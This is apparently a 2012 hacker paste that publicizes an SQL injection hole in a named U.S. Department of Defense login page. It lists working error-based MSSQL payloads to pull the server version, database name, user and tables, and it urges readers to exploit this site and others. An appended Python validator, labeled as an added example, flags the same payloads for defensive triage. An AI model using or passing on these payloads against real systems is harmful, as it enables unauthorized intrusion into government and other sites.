Zer0Pwn

U.S Department of Defense VULNERABLE | @Zer0Pwn

Jul 9th, 2012
Zer0Pwn - @Zer0Pwn
###############################################

Hello, friends. Today, I have quite an interesting vulnerability to share. I have tested it, and it does work. So instead of exploiting it, I thought I'd let you guys have some fun messing around with it. The vulnerability lies on the good old U.S. Department of Defense (dod.mil). The vulnerability is POST MSSQL injection. A lot of sites are vulnerable to this same one... So keep checking for this same kind of thing on other websites as well. Enjoy.

###############################################

Target ==> United States Department of Defense
Reason ==> Thought I'd go a little more hard-core.
Site ==> http://www.dod.mil/
Vulnerability ==> POST MSSQL Injection
Vulnerable Area ==> https://www.jieddo.dod.mil/jcwe/intel/externallogin.asp

Instructions:

You must put an email before any of your queries, or else it won't work. For example:
asd@asd.com' HAVING 1=1--

To get the version:
asd@asd.com' or 1=convert(int, @@version)--

To get the database:
asd@asd.com' or 1=convert(int, db_name())--

To get the current user:
asd@asd.com' or 1=convert(int, user_name())--

To get tables:
asd@asd.com' or 1=convert(int,(select top 1 table_name from information_schema.tables))--

After you're done messing around, check me out on Twitter: @Zer0Pwn

###############################################

Also, I released this on my Twitter, but I'm sure everyone hasn't heard it yet. Anyways, I have left @TheWikiBoat. We had some personal issues going on between us, and I eventually decided it would be best for me and for the group that I leave. So now I'm flying solo again.
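
A defensive check for the input shapes listed in the paste, as an added example that is not part of the original paste: it validates a login form's email field against a strict allow-list and labels the error-based MSSQL probes (HAVING 1=1, convert(int, ...) around server metadata or a schema subquery) for log triage. The function names, the regexes and the sample values are assumptions constructed for illustration.

```python
import re

# Strict allow-list for the email field (assumption: quotes, spaces and
# parentheses are never legitimate in this login form's email input).
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Signatures for the error-based T-SQL probes shown in the paste. They are
# for log triage only; the actual fix is to bind the email as a query
# parameter so the input is never parsed as SQL.
SIGNATURES = [
    ("quote-breakout", re.compile(r"'")),
    ("having-probe", re.compile(r"\bhaving\s+\d+\s*=\s*\d+", re.I)),
    ("convert-int-error", re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),
    ("server-metadata",
     re.compile(r"@@version|\bdb_name\s*\(|\buser_name\s*\(", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\.", re.I)),
    ("comment-terminator", re.compile(r"--\s*$")),
]

def is_valid_email(value):
    """True only if the whole value matches the allow-list."""
    return EMAIL_RE.fullmatch(value) is not None

def classify(value):
    """Return the names of all signatures that match a submitted field."""
    return [name for name, rx in SIGNATURES if rx.search(value)]

def triage(fields):
    """Map each rejected input to the signatures it matched."""
    return {v: classify(v) for v in fields if not is_valid_email(v)}

# Constructed sample of submitted email values: two benign, three in the
# shapes the paste lists.
SAMPLE = [
    "alice@example.org",
    "o.brien+mail@example.co.uk",
    "asd@asd.com' HAVING 1=1--",
    "asd@asd.com' or 1=convert(int, @@version)--",
    "asd@asd.com' or 1=convert(int,(select top 1 table_name "
    "from information_schema.tables))--",
]

if __name__ == "__main__":
    for value, hits in triage(SAMPLE).items():
        print(f"REJECT {value!r}: {', '.join(hits)}")
```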